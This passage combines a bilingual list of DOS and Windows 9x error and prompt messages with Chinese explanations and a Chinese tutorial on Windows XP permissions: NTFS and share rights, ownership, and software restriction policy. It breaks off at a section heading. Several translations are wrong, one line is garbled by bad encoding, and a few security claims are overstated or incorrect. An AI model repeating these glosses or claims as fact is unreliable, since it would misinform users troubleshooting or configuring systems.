Remove some drivers from your CONFIG.SYS file, and then try again 请从CONFIG.SYS文件中删除部分驱动程序,然后再试

Remove some drivers, and then try again 去除一些驱动程序,然后再试。这里的驱动程序是指在CONFIG.SYS中使用device或devicehigh命令加载的程序文件

Remove some disk drivers from your CONFIG.SYS file, and then try again 从你的(CONFIG.SYS)移去部分程序,然后再试

The configuration specified in your CONFIG.SYS file is too large for memory 调整你的CONFIG.SYS文件以获得足够大的内存

You have too many block devices specified in your CONFIG.SYS file 调整你的CONFIG.SYS文件以获得block devices

The STACKS setting(s) in your CONFIG.SYS file are incorrect 在你的CONFIG.SYS中堆栈设置不正确

Default stack settings will be used instead 缺省的堆栈设置将被替代使用

There is an error in your CONFIG.SYS file on line XX 在你的CONFIG.SYS里XX行错误

Warning: Logical drives past Z exist and will be ignored 警告:逻辑驱动器Z已经存在,将被忽略

Type the name of the Command Interpreter (e.g., C:\WINDOWS\COMMAND.COM) Press any key to continue… 请输入命令解释器的文件名(如:C:\WIN DOWS\COMMAND.COM)后,按任意键继续

Windows is bypassing your startup files

Minimal network support will be loaded if available Windows正在跳过你的启动文件。如果网络可用,最小网络支持将被加载

Windows is starting the command prompt only Windows正在启动命令字符模式

Windows will prompt you to confirm each startup command Windows将提示你确认每一个启动命令

The compression driver cannot be set up correctly 压缩驱动程序不能被正确加载

Get a version from your vendor that is compatible with this version of Windows 从你的供应商那里获得一个与Windows版本相兼容的版本

Process the system registry 运行系统注册表

Create a startup log file (BOOTLOG.TXT) 创建启动日志BOOTLOG.TXT文件

Process your startup device drivers (CONFIG.SYS) 运行CONFIG.SYS文件中的设备驱动

Process your startup command file (AUTOEXEC.BAT) 运行AUTOEXEC.BAT中的启动命令

Load the Windows graphical user interface 装入WINDOWS图形用户界面(GDI)

Warning: Windows has detected a registry/configuration error. Choose, Command prompt only, and run SCANREG 警告:Windows检测到一个注册表或配置错误选择DOS操作模式,运行SCANREG

Warning: Windows has detected a compressed drive access error. Choose Safe mode command prompt only, to help you identify the problem 警告:Windows检测到一个访问压缩驱动器错误,选择安全模式下的MS-DOS,来帮助你识别这个问题

Warning: Windows did not finish loading on the previous attempt. Choose Safe mode, to start Windows with a minimal set of drivers 警告:Windows在刚才尝试后不能够完成加载,选择安全模式,用最小驱动启动你的电脑

Warning: Windows multi-boot may not function correctly

Check for system files in your root directory with conflicting extensions 警告:Windows不能够正确完成多系统启动,在你的ROOT目录里检查不一致的系统文件

Warning: the system configuration manager failed to run. Some of your real-mode device drivers may not initialize properly 警告:系统管理器运行失败,一些实模式驱动可能没有正确初始化

The BUFFERS setting(s) in your CONFIG.SYS file are too large. Default buffer settings will be used instead 在你的CONFIG.SYS里BUFFER设置太大。默认的BUFFER缓冲器设置将被使用

A memory allocation error occurred during startup

>Restart your computer and select Interactive Start to identify the problem 在启动过程中内存分配发生错误,请重新启动你的计算机然后选用交互式方式启动来确定故障原因

Warning: the high memory area (HMA) is not available Additional low memory (below 640K) will be used instead 警告:高端内存不可用,低端内存将被代替使用

There is not enough memory for Windows. Remove some drivers from your CONFIG.SYS file, and then try again 对Windows来说没有足够的内存,请从CONFIG.SYS文件中移去部分加载的程序,然后再试着启动你的读入计算机

Your previous MS-DOS files were not found. 旧的MS-DOS文件没有找到,这常见于使用双启动的系统,另一个系统是DOS6

Your previous MS-DOS version is not supported. MS-DOS startup failed 旧的MS-DOS版本不支持。MS-DOS启动失败

Now loading your previous version of MS-DOS, please wait 现在正在加载旧的MS-DOS版本,请等待

Invalid setting in the MSDOS.SYS file:An internal stack overflow has caused this session to be halted MSDOS.SYS文件中无效的设置选项。系统堆栈溢出,系统挂起

Change the STACKS setting in your CONFIG.SYS file, and then try again 请改变CONFIG.SYS文件中的STACK设置,然后再试

Stack overflow 堆栈溢出

Integer divide by 0  整数被0除

Not enough space for environment  没有足够的空间

Run-time error 运行错误

Floating-point support not loaded  浮点运算支持没有装入

Null pointer assignment  无效的断点分配

六、COMMAND中的提示信息

提示信息 说    明

Stack overflow 堆栈溢出

Integer divide by 0 分母是0

Not enough space for environment 磁盘没有足够的空间

Run-time error 时钟错误

No fixed disks present 没有硬盘存在

Insufficient memory 内存不足

Invalid drive specification 无效的驱动器名

Invalid characters in volume label 无效的盘符

Invalid Volume ID 无效的卷标ID号

No target drive specified 目标驱动器没有定义

missing operating system 系统文件丢失

Non system Disk or Disk Error 不是系统盘或磁盘错误

Replace Disk and Press Anykey To Reboot 替换磁盘,按任意键重新启动

  七、SYS传送系统文件时的提示信息

提示信息 说    明

Cannot find System Files 不能找到系统文件

System transferred 系统传送完毕

Disk unsuitable for system disk 目标磁盘不适合做系统盘

  八、FORMAT中的提示信息

提示信息 说    明

Unable to write BOOT. 不能写引导扇区

Invalid media type 无效的磁盘类型

Parameters not supported 参数不支持

Cannot format a network drive 不能格式化网络驱动器

Invalid media or Track 0 bad - disk unusable 无效的磁盘或0磁道损坏,磁盘不可用

Format terminated 格式化终止

Disk Boot failure 磁盘BOOT区错误

Invalid system disk 无效的系统磁盘

Disk I/O error,Replace the disk, and then

press any key 磁盘I/O错误,请换盘后按任意键。通常在读写软盘时出现此类错误

Non-System disk or disk error,Replace and strike any key when ready 无系统的磁盘或磁盘错误,请替换后按任意键

Too many open files 打开的文件太多

Access denied Insufficient memory 没有足够的内存访问被拒绝

Invalid drive specification 无效的盘符说明

Parse Error XX 分析错误 XX

Incorrect MS-DOS version 不正确的MS-DOS版本

X% percent completed 格式化正在进行,已经完成X%

Format complete. 格式化完成

XX bytes in bad sectors XX字节的坏扇区

XX bytes total disk space 磁盘的全睰占湮猉X字节

XX bytes available on disk 磁盘的可使用空间为XX字

Volume label (11 characters, ENTER for none)? 请输入磁盘卷标(总共11个字符,按回车为空)

Format not supported on drive X Format命令不支持驱动器X

Invalid device parameters from device driver 无效的设备驱动参数

Error writing FAT 写FAT表错误

Error writing directory 写DIR目录表错误

Cannot format an ASSIGN or SUBST drive 不能格式化ASSIGN和SUBST指定的驱动器

Cannot find System Files 没有找到系统文件

Cannot format a network drive 不能格式化网络驱动器

Invalid characters in volume label 磁盘卷标中存在非法字符

Parameters not supported 参数不支持

Format terminated 格式化意外终止

Disk unsuitable for system disk 这个磁盘不适合作为系统盘

Unable to write BOOT 不能写BOOT区

Error reading directory 读DIR目录区错误

No target drive specified 目的驱动器没有说明

and press ENTER when ready 准备好后按回车键

System transferred 系统传送完毕

Enter current volume label for drive X 请为驱动器X输入磁盘的卷标

Parameters not compatible with fixed disk 参数与硬盘不兼容

Volume Serial Number is XXXX 分区格式化时随机产生的序列号是:XXXX

Format broken 格式化被强行终止

Format not available on drive XX 不能在驱动器XX上使用格式化命令

on-System disk or disk error 没有系统盘或磁盘错误

Bad Partition Table 错误的硬盘分区表

Parameters not supported by drive 该驱动器不支持这些参数

Insert DOS disk in drive A 请在驱动器A中插入DOS系统盘

WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE %1: WILL BE LOST! Proceed with 警告:硬盘分区X中的所有数据都将丢失,确定执行格式化命令吗?

Format another (Y/N)?! 还格式化其他盘吗

Error reading partition table 读硬盘分区表错误

Error writing partition table 写硬盘分区表错误

Parameters not compatible 参数不匹配

XX allocation units available on disk 磁盘上有XX可用簇

XX bytes in each allocation unit 每个簇有大小为XX字节

Same parameter entered twice 相同的参数被输入两次

Must enter both /T and /N parameters /T和/N参数必须同时使用

There is not enough room to create a restore file 没有足够的空间来建立恢复文件

You will not be able to use the UNFORMAT utility 你将不能使用UNFORMAT工具来恢复你的硬盘数据

There is not enough disk space for system files 没有足够的空间来存储系统文件

This disk cannot be unformatted 这个磁盘不能被反格式化

There was an error creating the format recovery file 在建立恢复文件时产生了一个错误

Volume label is not supported with /8 parameter 该驱动器不支持/8参数

Insufficient memory to load system files 没有足够的内存装入系统文件

Insufficient memory. 内存不足

Calculating free space (this may take several minutes)... 正在统计磁盘空间(可能要花上几分钟时间)

  九、FDISK中的提示信息

提示信息 说    明

Delete Primary DOS Partition 删除主DOS分区

Delete Extended DOS Partition 删除扩展DOS分区

Delete Logical DOS Drive(s) in the Extended DOS Partition 删除逻辑DOS分区

WARNING! Data in the deleted Primary DOS Partition will be lost 警告:主DOS分区的数据将全部丢失

WARNING! Data in the deleted Extended DOS Partition will be lost. Do you wish to continue (Y/N)? 警告:扩展分区中的数据将全部丢失,你真的继续吗

Delete Logical DOS Drive(s) in the Extended DOS Partition 删除扩展分区下的逻辑分区

WARNING! Data in a deleted Logical DOS Drive will be lost What drive do you want to delete? Are you sure (Y/N)? 警告:逻辑分区中的所有数据都将丢失,你删除哪个驱动器?你真的确定吗

Display Partition Information 显示分区内容信息

The Extended DOS Partition contains Logical DOS Drives. 扩展DOS分区中包含DOS逻辑分区

Do you want to display the logical drive information (Y/N)? 你想显示逻辑分区的信息吗

Display Logical DOS Drive Information 显示逻辑分区信息

Enter partition size in Mbytes or percent of disk space (%) to create a Primary DOS Partition... 输入所建立主DOS分区的容量,单位是百分比

Enter logical drive size in Mbytes or percent of disk space (%)... 请输入逻辑分区容量大小或磁盘空间的百分比

Enter Volume Label? 请输入卷标

Enter partition size in Mbytes or percent of disk space (%)to create an Extended DOS Partition.... 请输入扩展DOS分区的容量大小或磁盘空间的百分比

Do you wish to use the maximum available size for a Primary DOS Partition 你想使用全部磁盘空间作为主DOS分区吗

Change Current Fixed Disk Drive . Enter Fixed Disk Drive Number (X) 当你挂接两个以上硬盘时,在FDISK的系统菜单中将多一个第5项,选择第5项时,将提示:请输入硬盘的序号

Fixed Disk Drive Status 硬盘状态.

WINDOWS权限设置详解

作为微软第一个稳定且安全的操作系统,Windows XP经过几年的磨合过渡期,终于以超过Windows系列操作系统50%的用户占有量成为目前用户使用最多的操作系统。在慢慢熟悉了Windows XP后,人们逐渐开始不满足基本的系统应用了,他们更加渴望学习一些较深入且实用的知识,以便能让系统充分发挥出Windows XP的高级性能。

因此本文以Windows XP Professional版本为平台,引领大家感受一下Windows XP在"权限"方面的设计魅力!

一、什么是权限

Windows XP提供了非常细致的权限控制项,能够精确定制用户对资源的访问控制能力,大多数的权限从其名称上就可以基本了解其所能实现的内容。

" 权限"(Permission)是针对资源而言的。也就是说,设置权限只能是以资源为对象,即"设置某个文件夹有哪些用户可以拥有相应的权限",而不能是以用户为主,即"设置某个用户可以对哪些资源拥有权限"。这就意味着"权限"必须针对"资源"而言,脱离了资源去谈权限毫无意义──在提到权限的具体实施时,"某个资源"是必须存在的。

利用权限可以控制资源被访问的方式,如User组的成员对某个资源拥有"读取"操作权限、Administrators组成员拥有"读取+写入+删除"操作权限等。

值得一提的是,有一些Windows用户往往会将"权力"与"权限"两个非常相似的概念搞混淆,这里做一下简单解释:"权力"(Right)主要是针对用户而言的。"权力"通常包含"登录权力" (Logon Right)和"特权"(Privilege)两种。登录权力决定了用户如何登录到计算机,如是否采用本地交互式登录、是否为网络登录等。特权则是一系列权力的总称,这些权力主要用于帮助用户对系统进行管理,如是否允许用户安装或加载驱动程序等。显然,权力与权限有本质上的区别。

二、安全标识符、访问控制列表、安全主体

说到Windows XP的权限,就不能不说说"安全标识符"(Security Identifier, SID)、"访问控制列表"(Access Control List,ACL)和安全主体(Security Principal)这三个与其息息相关的设计了。

1.安全标识符

在Windows XP中,系统是通过SID对用户进行识别的,而不是很多用户认为的"用户名称"。SID可以应用于系统内的所有用户、组、服务或计算机,因为SID是一个具有惟一性、绝对不会重复产生的数值,所以,在删除了一个账户(如名为"A"的账户)后,再次创建这个"A"账户时,前一个A与后一个A账户的SID是不相同的。这种设计使得账户的权限得到了最基础的保护,盗用权限的情况也就彻底杜绝了。

查看用户、组、服务或计算机的SID值,可以使用 "Whoami"工具来执行,该工具包含在Windows XP安装光盘的"Support\Tools"目录中,双击执行该目录下的"Setup"文件后,将会有包括Whoami工具在内的一系列命令行工具拷贝到"X:\Program Files\Support Tools"目录中。此后在任意一个命令提示符窗口中都可以执行"Whoami /all"命令来查看当前用户的全部信息。

2.访问控制列表(ACL)

访问控制列表是权限的核心技术。顾名思义,这是一个权限列表,用于定义特定用户对某个资源的访问权限,实际上这就是Windows XP对资源进行保护时所使用的一个标准。

在访问控制列表中,每一个用户或用户组都对应一组访问控制项(Access Control Entry, ACE),这一点只需在"组或用户名称"列表中选择不同的用户或组时,通过下方的权限列表设置项是不同的这一点就可以看出来。显然,所有用户或用户组的权限访问设置都将会在这里被存储下来,并允许随时被有权限进行修改的用户进行调整,如取消某个用户对某个资源的"写入"权限。

3.安全主体(Security Principal)

在Windows XP中,可以将用户、用户组、计算机或服务都看成是一个安全主体,每个安全主体都拥有相对应的账户名称和SID。根据系统架构的不同,账户的管理方式也有所不同──本地账户被本地的SAM管理;域的账户则会被活动目录进行管理......

一般来说,权限的指派过程实际上就是为某个资源指定安全主体(即用户、用户组等)可以拥有怎样的操作过程。因为用户组包括多个用户,所

以大多数情况下,为资源指派权限时建议使用用户组来完成,这样可以非常方便地完成统一管理。

三、权限的四项基本原则

在Windows XP中,针对权限的管理有四项基本原则,即:拒绝优于允许原则、权限最小化原则、累加原则和权限继承性原则。这四项基本原则

对于权限的设置来说,将会起到非常重要的作用,下面就来了解一下:

1.拒绝优于允许原则

" 拒绝优于允许"原则是一条非常重要且基础性的原则,它可以非常完美地处理好因用户在用户组的归属方面引起的权限"纠纷",例如,"shyzhong"这个用户既属于"shyzhongs"用户组,也属于"xhxs"用户组,当我们对"xhxs"组中某个资源进行"写入"权限的集中分配(即针对用户组进行) 时,这个时候该组中 "shyzhong"账户将自动拥有"写入"的权限。

但令人奇怪的是,"shyzhong"账户明明拥有对这个资源的"写入 "权限,为什么实际操作中却无法执行呢?原来,在"shyzhongs"组中同样也对"shyzhong"用户进行了针对这个资源的权限设置,但设置的权限是"拒绝写入"。基于"拒绝优于允许"的原则,"shyzhong"在"shyzhongs"组中被 "拒绝写入"的权限将优先"xhxs"组中被赋予的允许"写入"权限被执行。因此,在实际操作中,"shyzhong"用户无法对这个资源进行"写入"操作。

2.权限最小化原则

Windows XP将"保持用户最小的权限"作为一个基本原则进行执行,这一点是非常有必要的。这条原则可以确保资源得到最大的安全保障。这条原则可以尽量让用户不能访问或不必要访问的资源得到有效的权限赋予限制。

基于这条原则,在实际的权限赋予操作中,我们就必须为资源明确赋予允许或拒绝操作的权限。例如系统中新建的受限用户"shyzhong"在默认状态下对 "DOC"目录是没有任何权限的,现在需要为这个用户赋予对"DOC"目录有"读取"的权限,那么就必须在"DOC"目录的权限列表中为 "shyzhong"用户添加"读取"权限。

3.权限继承性原则

权限继承性原则可以让资源的权限设置变得更加简单。假设现在有个"DOC"目录,在这个目录中有"DOC01"、"DOC02"、"DOC03"等子目录,现在需要对DOC目录及其下的子目录均设置 "shyzhong"用户有"写入"权限。因为有继承性原则,所以只需对"DOC"目录设置"shyzhong"用户有"写入"权限,其下的所有子目录将自动继承这个权限的设置。

4.累加原则

这个原则比较好理解,假设现在"zhong"用户既属于"A"用户组,也属于"B"用户组,它在A用户组的权限是"读取",在"B"用户组中的权限是"写入",那么根据累加原则,"zhong"用户的实际权限将会是"读取+写入"两种。

显然,"拒绝优于允许"原则是用于解决权限设置上的冲突问题的;"权限最小化"原则是用于保障资源安全的;"权限继承性"原则是用于"自动化"执行权限设置的;而"累加原则"则是让权限的设置更加灵活多变。几个原则各有所用,缺少哪一项都会给权限的设置带来很多麻烦!

注意:在Windows XP中,"Administrators"组的全部成员都拥有"取得所有者身份"(Take Ownership)的权力,也就是管理员组的成员可以从其他用户手中"夺取"其身份的权力。例如受限用户"shyzhong"建立了一个DOC目录,并只赋予自己拥有读取权力,这看似周到的权限设置,实际上,"Administrators"组的全部成员将可以通过"夺取所有权"等方法获得这个权限。

四、资源权限高级应用

以文件与文件夹的权限为例,依据是否被共享到网络上,其权限可以分为NTFS权限与共享权限两种,这两种权限既可以单独使用,也可以相辅使用。两者之间既能够相互制约,也可以相互补充。下面来看看如何进行设置:

1.NTFS权限

首先我们要知道:只要是存在NTFS磁盘分区上的文件夹或文件,无论是否被共享,都具有此权限。此权限对于使用FAT16/FAT32文件系统的文件与文件夹无效!

NTFS权限有两大要素:一是标准访问权限;二是特别访问权限。前者将一些常用的系统权限选项比较笼统地组成6种"套餐型"的权限,即:完全控制、修改、读取和运行、列出文件夹目录、读取、写入。

在大多数的情况下,"标准权限"是可以满足管理需要的,但对于权限管理要求严格的环境,它往往就不能令管理员们满意了,如只想赋予某用户有建立文件夹的权限,却没有建立文件的权限;如只能删除当前目录中的文件,却不能删除当前目录中的子目录的权限等......这个时候,就可以让拥有所有权限选项的"特别权限"来大显身手了。也就是说,特别权限不再使用"套餐型",而是使用可以允许用户进行"菜单型"的细节化权限管理选择了。

那么如何设置标准访问权限呢?以对一个在NTFS分区中的名为"zhiguo"的文件夹进行设置标准访问权限为例,可以按照如下方法进行操作:

因为NTFS权限需要在资源属性页面的"安全"选项卡设置界面中进行,而Windows XP在安装后默认状态下是没有激活"安全"选项卡设置功能的,

所以需要首先启用系统中的"安全"选项卡。方法是:依次点击"开始"→"设置"→"控制面板 ",双击"文件夹选项",在"查看"标签页设置界面上的"高级设置"选项列表中清除"使用简单文件共享(推荐)"选项前的复选框后点击"应用"按钮即可。

设置完毕后就可以右键点击"zhiguo" 文件夹,在弹出的快捷菜单中选择"共享与安全",在"zhiguo属性"窗口中就可以看见"安全"选项卡的存在了。针对资源进行NTFS权限设置就是通过这个选项卡来实现的,此时应首先在"组或用户名称"列表中选择需要赋予权限的用户名组(这里选择"zhong"用户),接着在下方的"zhong 的权限"列表中设置该用户可以拥有的权限即可。

下面简单解释一下六个权限选项的含义:

①完全控制(Full Control):

该权限允许用户对文件夹、子文件夹、文件进行全权控制,如修改资源的权限、获取资源的所有者、删除资源的权限等,拥有完全控制权限就等于拥有了其他所有的权限;

②修改(Modify):

该权限允许用户修改或删除资源,同时让用户拥有写入及读取和运行权限;

③读取和运行(Read & Execute):

该权限允许用户拥有读取和列出资源目录的权限,另外也允许用户在资源中进行移动和遍历,这使得用户能够直接访问子文件夹与文件,即使用户没有权限访问这个路径;

④列出文件夹目录(List Folder Contents):

该权限允许用户查看资源中的子文件夹与文件名称;

⑤读取(Read):

该权限允许用户查看该文件夹中的文件以及子文件夹,也允许查看该文件夹的属性、所有者和拥有的权限等;

⑥写入(Write):

该权限允许用户在该文件夹中创建新的文件和子文件夹,也可以改变文件夹的属性、查看文件夹的所有者和权限等。

如果在"组或用户名称"列表中没有所需的用户或组,那么就需要进行相应的添加操作了,方法如下:点击"添加"按钮后,在出现的"选择用户和组"对话框中,既可以直接在"输入对象名称来选择"文本区域中输入用户或组的名称(使用"计算机名\用户名"这种方式),也可以点击"高级"按钮,在弹出的对话框中点击" 立即查找"按钮让系统列出当前系统中所有的用户组和用户名称列表。此时再双击选择所需用户或组将其加入即可。

如果想删除某个用户组或用户的话,只需在" 组或用户名称"列表中选中相应的用户或用户组后,点击下方的"删除"按钮即可。但实际上,这种删除并不能确保被删除的用户或用户组被拒绝访问某个资源,因此,如果希望拒绝某个用户或用户组访问某个资源,还要在"组或用户名称"列表中选择相应的用户名用户组后,为其选中下方的"拒绝"复选框即可。

那么如何设置特殊权限呢?假设现在需要对一个名为"zhiguo"的目录赋"zhong"用户对其具有"读取"、"建立文件和目录"的权限,基于安全考虑,又决定取消该账户的"删除"权限。此时,如果使用"标准权限"的话,将无法完成要求,而使用特别权限则可以很轻松地完成设置。方法如下:

首先,右键点击"zhiguo"目录,在右键快捷菜单中选择"共享与安全"项,随后在"安全"选项卡设置界面中选中"zhong"用户并点击下方的"高级"

按钮,在弹出的对话框中点击清空"从父项继承那些可以应用到子对象的权限项目,包括那些在此明确定义的项目"项选中状态,这样可以断开当前权限设置与父级权限设置之前的继承关系。在随即弹出的" 安全"对话框中点击"复制"或"删除"按钮后(点击"复制"按钮可以首先复制继承的父级权限设置,然后再断开继承关系),接着点击"应用"按钮确认设置,再选中"zhong"用户并点击"编辑"按钮,在弹出的"zhong的权限项目"对话框中请首先点击"全部清除"按钮,接着在"权限"列表中选择"遍历文件夹/运行文件"、"列出文件夹/读取数据"、"读取属性"、"创建文件/写入数据"、"创建文件夹/附加数据"、"读取权限"几项,最后点击"确定"按钮结束设置。

在经过上述设置后,"zhong"用户在对"zhiguo"进行删除操作时,就会弹出提示框警告操作不能成功的提示了。显然,相对于标准访问权限设置

上的笼统,特别访问权限则可以实现更具体、全面、精确的权限设置。

为了大家更好地理解特殊权限列表中的权限含义,以便做出更精确的权限设置,下面简单解释一下其含义:

⑴遍历文件夹/运行文件(Traverse Folder/Execute File):

该权限允许用户在文件夹及其子文件夹之间移动(遍历),即使这些文件夹本身没有访问权限。

注意:只有当在"组策略"中("计算机配置 "→"Windows设置"→"安全设置"→"本地策略"→"用户权利指派")将"跳过遍历检查"项授予了特定的用户或用户组,该项权限才能起作用。默认状态下,包"Administrators"、"Users"、"Everyone"等在内的组都可以使用该权限。

对于文件来说,拥了这项权限后,用户可以执行该程序文件。但是,如果仅为文件夹设置了这项权限的话,并不会让用户对其中的文件带上"执行"的权限;

⑵列出文件/读取数据(List Folder/Read Data):

该权限允许用户查看文件夹中的文件名称、子文件夹名称和查看文件中的数据;

⑶读取属性(Read Attributes):

该权限允许用户查看文件或文件夹的属性(如系统、只读、隐藏等属性);

⑷读取扩展属性(Read Extended Attributes):

该权限允许查看文件或文件夹的扩展属性,这些扩展属性通常由程序所定义,并可以被程序修改;

⑸创建文件/写入属性(Create Files/Write Data):

该权限允许用户在文件夹中创建新文件,也允许将数据写入现有文件并覆盖现有文件中的数据;

⑹创建文件夹/附加数据(Create Folder/Append Data):

该权限允许用户在文件夹中创建新文件夹或允许用户在现有文件的末尾添加数据,但不能对文件现有的数据进行覆盖、修改,也不能删除数据;

⑺写入属性(Write Attributes):

该权限允许用户改变文件或文件夹的属性;

⑻写入扩展属性(Write Extended Attributes):

该权限允许用户对文件或文件夹的扩展属性进行修改;

⑼删除子文件夹及文件(Delete Subfolders and Files):

该权限允许用户删除文件夹中的子文件夹或文件,即使在这些子文件夹和文件上没有设置删除权限;

⑽删除(Delete):

该权限允许用户删除当前文件夹和文件,如果用户在该文件或文件夹上没有删除权限,但是在其父级的文件夹上有删除子文件及文件夹权限,那么就仍然可以删除它;

⑾读取权限(Read Permissions):

该权限允许用户读取文件或文件夹的权限列表;

⑿更改权限(Change Permissions):

该权限允许用户改变文件或文件夹上的现有权限;

⒀取得所有权(Take Ownership):

该权限允许用户获取文件或文件夹的所有权,一旦获取了所有权,用户就可以对文件或文件夹进行全权控制。

这里需要单独说明一下"修改"权限与"写入 "权限的区别:如果仅仅对一个文件拥有修改权限,那么,不仅可以对该文件数据进行写入和附加,而且还可以创建新文件或删除现有文件。而如果仅仅对一个文件拥有写入权限,那么既可以对文件数据进行写入和附加,也可以创建新文件,但是不能删除文件。也就是说,有写入权限不等于具有删除权限,但拥有修改权限,就等同于拥有删除和写入权限。

2.共享权限(Shared Permission)

只要是共享出来的文件夹就一定具有此权限。如该文件夹存在于NTFS分区中,那么它将同时具有NTFS权限与共享权限,如果这个资源同时拥有NTFS和共享两种权限,那么系统中对权限的具体实施将以两种权限中的"较严格的权限"为准──这也是"拒绝优于允许"原则的一种体现!

例如,某个共享资源的NTFS权限设置为完全控制,而共享权限设置为读取,那么远程用户就只能使用"读取"权限对共享资源进行访问了。

注意:如果是FAT16/FAT32文件系统中的共享文件夹,那么将只能受到共享权限的保护,这样一来就容易产生安全性漏洞。这是因为共享权限只能够限制从网络上访问资源的用户,并无法限制直接登录本机的人,即用户只要能够登录本机,就可以任意修改、删除FAT16/FAT32分区中的数据了。因此,从安全角度来看,我们是不推荐在Windows XP中使用FAT16/FAT32分区的。

设置共享权限很简单,在右键选中并点击一个文件夹后,在右键快捷菜单中选择"共享与安全"项,在弹出的属性对话框"共享"选项卡设置界面中点击选中"共享该文件夹"项即可,这将使共享资源使用默认的权限设置(即"Everyone"用户拥有读取权限)。如果想具体设置共享权限,那么请点击"权限"按钮,在打开的对话框中可以看到权限列表中有"完全控制 "、"更改"和"读取"三项权限可供选择。

下面先简单介绍一下这三个权限的含义:

①完全控制:允许用户创建、读取、写入、重命名、删除当前文件夹中的文件以及子文件夹,另外,也可以修改该文件夹中的NTFS访问权限和夺取所有权;

②更改:允许用户读取、写入、重命名和删除当前文件夹中的文件和子文件夹,但不能创建新文件;

③读取:允许用户读取当前文件夹的文件和子文件夹,但是不能进行写入或删除操作。

说完了权限的含义,我们就可以点击"添加"按钮,将需要设置权限的用户或用户组添加进来了。在缺省情况下,当添加新的组或用户时,该组或用户将具备"读取"(Read)权限,我们可以根据实际情况在下方的权限列表中进行复选框的选择与清空。

接着再来说说令很多读者感到奇怪的"组和用户名称"列表中的"Everyone"组的含义。在Windows 2000中,这个组因为包含了"Anonymous Logon"组,所以它表示"每个人"的意思。但在Windows XP中,请注意──这个组因为只包括"Authenticated Users"和"Guests"两个组,而不再包括"Anonymous Logon"组,所以它表示了"可访问计算机的所有用户",而不再是"每个人"!请注意这是有区别的,"可访问计算机的所有用户"意味着必须是通过认证的用户,而"每个人"则不必考虑用户是否通过了认证。从安全方面来看,这一点是直接导致安全隐患是否存在关键所在!

当然,如果想在 Windows XP中实现Windows 2000中那种"Everyone"设计机制,那么可以通过编辑"本地安全策略"来实现,方法是:在"运行"栏中输入"Secpol.msc"命令打开" 安全设置"管理单元,依次展开"安全设置"→"本地策略",然后进入"安全选项",双击右侧的"网络访问:让‘每个人'权限应用于匿名

用户"项,然后选择"已启用"项即可。

注意:在Windows XP Professional中,最多可以同时有10个用户通过网络登录(指使用认证账户登录的用户,对于访问由IIS提供的Web服务的用户没有限制)方式使用某一台计算机提供的共享资源。

3.资源复制或移动时权限的变化与处理

在权限的应用中,不可避免地会遇到设置了权限后的资源需要复制或移动的情况,那么这个时候资源相应的权限会发生怎样的变化呢?下面来了解一下:

(1)复制资源时

在复制资源时,原资源的权限不会发生变化,而新生成的资源,将继承其目标位置父级资源的权限。

(2)移动资源时

在移动资源时,一般会遇到两种情况,一是如果资源的移动发生在同一驱动器内,那么对象保留本身原有的权限不变(包括资源本身权限及原先从父级资源中继承的权限);二是如果资源的移动发生在不同的驱动器之间,那么不仅对象本身的权限会丢失,而且原先从父级资源中继承的权限也会被从目标位置的父级资源继承的权限所替代。实际上,移动操作就是首先进行资源的复制,然后从原有位置删除资源的操作。

(3)非NTFS分区

上述复制或移动资源时产生的权限变化只是针对NTFS分区上而言的,如果将资源复制或移动到非NTFS分区(如FAT16/FAT32分区)上,那么所有的权限均会自动全部丢失。

4.资源所有权的高级管理

有时我们会发现当前登录的用户无法对某个资源进行任何操作,这是什么原因呢?其实这种常见的现象很有可能是因为对某个资源进行的NTFS权限设置得不够完善导致的──这将会造成所有人(包括 "Administrator"组成员)都无法访问资源,例如不小心将"zhiguo"这个文件夹的所有用户都删除了,这将会导致所有用户都无法访问这个文件夹,此时很多朋友就会束手无策了,其实通过使用更改所有权的方法就可以很轻松地解决这类权限问题了。

首先,我们需要检查一下资源的所有者是谁,如果想查看某个资源(如sony目录)的用户所有权的话,那么只需使用"dir sony /q"命令就可以了。在反馈信息的第一行就可以看到用户是谁了,例如第一行的信息是"lovebook\zhong",那么意思就是lovebook这台计算机中的"zhong"用户。

如果想在图形界面中查看所有者是谁,那么需要进入资源的属性对话框,点击"安全"选项卡设置界面中的"高级"按钮,在弹出的"(用户名)高级安全设置"界面中点击"所有者"选项卡,从其中的"目前该项目的所有者"列表中就可以看到当前资源的所有者是谁了。

如果想将所有者更改用户,那么只需在"将所有者更改为"列表中选择目标用户名后,点击"确定"按钮即可。此外,也可以直接在"安全"选项卡设置界面中点击"添加"按钮添加一个用户并赋予相应的权限后,让这个用户来获得当前文件夹的所有权。

注意:查看所有者究竟对资源拥有什么样的权限,可点击进入"有效权限"选项卡设置界面,从中点击"选择"按钮添加当前资源的所有者后,就可以从下方的列表中权限选项的勾取状态来获知了。

五、程序使用权限设定

Windows XP操作系统在文件管理方面功能设计上颇为多样、周全和智能化。这里通过"程序文件使用权限"设置、将"加密文件授权多个用户可以访问"和了解系统日志的访问权限三个例子给大家解释一下如何进行日常应用。

1.程序文件权限设定

要了解Windows XP中关于程序文件的访问权限,我们应首先来了解一下Windows XP在这方面的两个设计,

一、是组策略中软件限制策略的设计;

二、是临时分配程序文件使用权限的设计。

(1)软件限制策略

在"运行"栏中输入 "Gpedit.msc"命令打开组策略窗口后,在"计算机配置"→"Windows设置"→"安全设置"分支中,右键选中"软件限制策略"分

支,在弹出的快捷菜单中选择新建一个策略后,就可以从"软件限制策略"分支下新出现的"安全级别"中看到有两种安全级别的存在了。

这两条安全级别对于程序文件与用户权限之前是有密切联系的:

①不允许的:从其解释中可以看出,无论用户的访问权如何,软件都不会运行;

② 不受限的:这是默认的安全级别,其解释为 "软件访问权由用户的访问权来决定"。显然,之所以在系统中可以设置各种权限,是因为有这个默认安全策略在背后默默支持的缘故。如果想把"不允许的"安全级别设置为默认状态,只需双击进入其属性界面后点击"设为默认值"按钮即可。

(2)临时分配程序文件

为什么要临时分配程序文件的管理权限呢?这是因为在Windows XP中,有许多很重要的程序都是要求用户具有一定的管理权限才能使用的,因此在使用权限不足以使用某些程序的账户时,为了能够使用程序,我们就需要为自己临时分配一个访问程序的管理权限了。为程序分配临时管理权限的方法很简单:右键点击要运行的程序图标,在弹出的快捷菜单中选择"运行方式",在打开的"运行身份"对话框中选中"下列用户"选项,在"用户名"和"密码"右侧的文本框中指定用户及密码即可。

显然,这个临时切换程序文件管理权限的设计是十分有必要的,它可以很好地起到保护系统的目的。

2.授权多个用户访问加密文件

